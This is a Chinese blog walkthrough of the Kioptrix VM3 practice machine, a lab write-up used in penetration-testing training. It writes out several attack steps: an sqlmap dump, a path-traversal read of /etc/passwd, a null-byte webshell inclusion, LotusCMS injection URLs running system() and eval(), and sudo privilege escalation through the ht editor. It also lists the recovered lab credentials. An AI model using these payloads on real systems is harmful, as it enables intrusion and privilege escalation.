Kioptrix VM3 靶机 - 详细流程

已于 2024-09-21 17:40:09 修改
阅读量892 收藏 26
点赞数 15
文章标签: 网络安全 web安全 安全
于 2024-09-19 01:25:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73983897/article/details/142346601
版权

  • 准备工作

  1. 靶机下载链接:https://download.vulnhub.com/kioptrix/KVM3.rar
  2. 下载后解压,点击文件 .vmx

  3. 启动虚拟机,点击 否 ,安装虚拟机

  4. 启动成功

  5. 修改网卡(与自己的主机在同一网段下即可,有插网线推荐桥接,WIFI推荐NAT),这里我选择NAT,点击确定

  6. 再次打开上面 网络适配器 的页面在 高级 中查看MAC地址

  7. 重启靶机

  • 信息收集

  1. 确定NAT网段

  2. 可以看到NAT是192.168.142.0/24 网段的

  3. kali 执行

    sudo nmap -sn -PR 192.168.142.0/24

  4. 发现靶机IP为:192.168.142.144

  5. 端口扫描:nmap -p- 192.168.142.144

  6. 发现其开放 22 和 80 端口,

  7. 尝试访问80端口,发现如下页面

  • 获取shell(3)

方式一:SQL注入

  • SQL注入URL路径:/gallery/gallery.php?id=1

  • 通过SQLMap下载数据

    sqlmap -u "http://192.168.142.144/gallery/gallery.php?id=1" --dump --batch

  • 发现 dev_accounts.csvgallarific_users.csv  文件中包含账号信息

  • 测试发现其中账号密码为:2个普通权限ssh用户和1个网站管理员用户

    ssh 账号1/密码:dreg/Mast3r		 
ssh 账号2/密码:loneferret/starwars       [推荐]
http://192.168.142.144/gallery/gadmin/   超级用户页面账号/密码:admin/n0t7t1k4

方式二:文件包含

  • 在翻找的过程中发现在 http://192.168.142.144/index.php?system=Blog 包含了 ?system=Blog

  • 尝试文件包含:http://192.168.142.144/index.php?system=../../../../../../../../etc/passwd.      

  • 发现可以进行读取,并发现了其网站的绝对路径 /home/www/kioptrix3.com/core/lib

  • PS:上图中的eval() 函数,后面会通过命令执行进行利用

  • 通过 http://192.168.142.144/gallery/gadmin/photos.php 编辑图片功能点,使其包含恶意的代码

  • 上传包含恶意代码的图片

  • Burp抓包,发送到 Repeater 修改数据

    1. 修改前

    2. 修改后

    3. 切换到Hex,将php后的点修改为00,修改前

    4. 修改后,点击 Send 发送

    5. 返回Proxy,点击Drop,将原来的包丢掉

  • 回到网页,点击修改图片的View,查看文件名(这里文件名是不同的,记得看自己修改文件的文件名)

  • 计算文件路径:

    1. 绝对路径:/home/www/kioptrix3.com/core/lib
    2. URL 路径:http://192.168.142.144/gallery/photos/dmkn94ly0n.jpg
    3. 等于 /home/www/kioptrix3.com/gallery/photos/dmkn94ly0n.jpg

  • 进行包含,并使用蚁剑连接

    http://192.168.142.144/index.php?system=../../../../../../../../home/www/kioptrix3.com/gallery/photos/dmkn94ly0n.jpg%00.

  • 执行命令,发现是个普通用户

方式三:命令执行
  • 这里部分源代码及解读推荐看下大佬的文章(末尾处):vulnhub KioptrixVM3 靶场练习&LotusCMS漏洞分析 - rpsate - 博客园 (cnblogs.com)
  • 这里只谈如何利用,可以通过   '.命令.'  的格式执行系统命令 
    例: '.system(whoami).'
http://192.168.142.144/index.php?page=%27.system(whoami).%27

  • 或是查看phpinfo 页面 和 蚁剑连接 
    phpinfo() 页面: '.phpinfo().'
http://192.168.142.144/index.php?page=%27.phpinfo().%27

蚁剑连接: '@eval($_POST[%27cmd%27])'
http://192.168.142.144/index.php?page=%27.@eval($_POST[%27cmd%27]).%27

  • 权限提升 - SUDO 提权

  1. 这里直接使用已经获得的 SSH 账号进行提权

    账号:loneferret
密码:starwars

  2. 列出当前用户拥有sudo权限的命令

    sudo -l

  3. 发现拥有sudo权限的是个编辑器

  4. 打开编辑器,发现报错

    sudo /usr/local/bin/ht

  5. 设置环境变量,继续执行上述命令

    export TERM=xterm
sudo /usr/local/bin/ht

  6. 打开如下界面

  7. 整体流程:按下 F3 - 输入想编辑的文件 - 编辑完成后 - F2 保存 - Ctrl+C 退出

  8. 举例:编辑/etc/passwdloneferret 用户提升至 root 权限

    1. 输入 /etc/passwd ,按下回车键

    2. 进行编辑(修改前)

    3. 修改后

    4. 编辑完成后 - F2 保存 - Ctrl+C 退出

  9. 重新登录 loneferret 用户,发现权限已经变为了 root

    账号:loneferret
密码:starwars

  10. PS:可以编辑任意文件这点,权限实在是太过了,这种权限已经可以变着花样玩了(增删改查,无所不能)

  • 总结

  1. 流程:主机发现 -  信息收集 - web渗透 -  获取shell - 权限提升
  2. 信息收集:
    1. 这次的靶机算是一个很标准的靶机了,信息收集的内容几乎全占了;
    2. 其中通过指纹信息,搜索LotusCMS的漏洞发现可以通过命令执行获取Shell,算一个较大的战果;
    3. 通过 PHP 的版本信息(5.2.4),容易联想到文件包含的00截断绕过(PHP<5.3.4)
    4. 还有些通过观察系统版本(2.6.24) ,发现可以进行脏牛提取(2.6.22 < x < 3.9)等等
  3. web渗透:
    1. SQL注入,很标准的一套流程,仅通过SQL注入就成功获得了shell,在靶机中很是少见了;
    2. 文件包含,这次参数 ?system=Blog 并没有显示的文件特征,但也尝试进行了包含,没想到还真有意外之喜;
    3. 文件上传,PHP的版本算一个提示信息;
    4. 命令执行,属于Nday,这个较为轻松;
  4. PS:比较基础,但值得回味。

冰水°
关注
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1092
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 538
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
渗透测试靶机---Kioptrix Level 3
久恙502的博客
07-19 317
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
【vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 542
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 882
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
VulnHub靶机入门篇--kioptrix.level 3
2302_78903258的博客
07-29 990
发现有一个login的登录框,可能存在sql注入漏洞,或者弱口令,并且发现这里有一个LotusCMS,网上查找一个信息,看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的,所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary,或者使用命令。这里一直没有什么反应,可能是脚本的原因,用。哎,还是失败 ,查看原因,说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用,只能看看80端口的服务。使用第14个的命令或者使用命令。
渗透测试靶机---Kioptrix4
久恙502的博客
07-19 291
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 346
Kioptrix Level 3 靶机wp
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 967
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Kioptrix2-WalkThrough 靶机复现.docx
10-18
本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,以确定靶机的 IP 地址。在这里,...
KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇
qq_27466929的博客
09-11 1264
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.3
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 854
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
网络安全证书考取相关知识
aa98865646的博客
09-21 646
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 630
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全详解
weidl001的博客
09-21 1413
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
最新发布
2401_84434570的博客
09-26 559
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1269
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值